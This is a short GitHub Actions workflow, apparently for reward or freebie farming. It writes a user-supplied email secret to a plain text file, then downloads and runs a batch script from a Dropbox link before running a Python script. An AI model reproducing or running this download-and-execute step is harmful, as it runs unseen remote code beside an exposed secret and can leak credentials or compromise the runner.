name: Haoyangmao

on:
  workflow_dispatch:
    inputs:
      EMAIL_SECRET:
        description: 'YOUR EMIAL_SECRET'
        required: true

jobs:
  build:
    runs-on: windows-latest

    steps:
      - name: Downloading & Setting Up
        run: |
         echo "EMAIL_SECRET=${{ github.event.inputs.EMAIL_SECRET }}" > secrets.txt
         Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/gdzoens68gz1o4wuwtf0x/down.bat?rlkey=wd1ecn33dv9yn2uvdyynavbs6&dl=1" -OutFile "down.bat"
         cmd /c down.bat

      - name: Time Counter
        run: python time.py
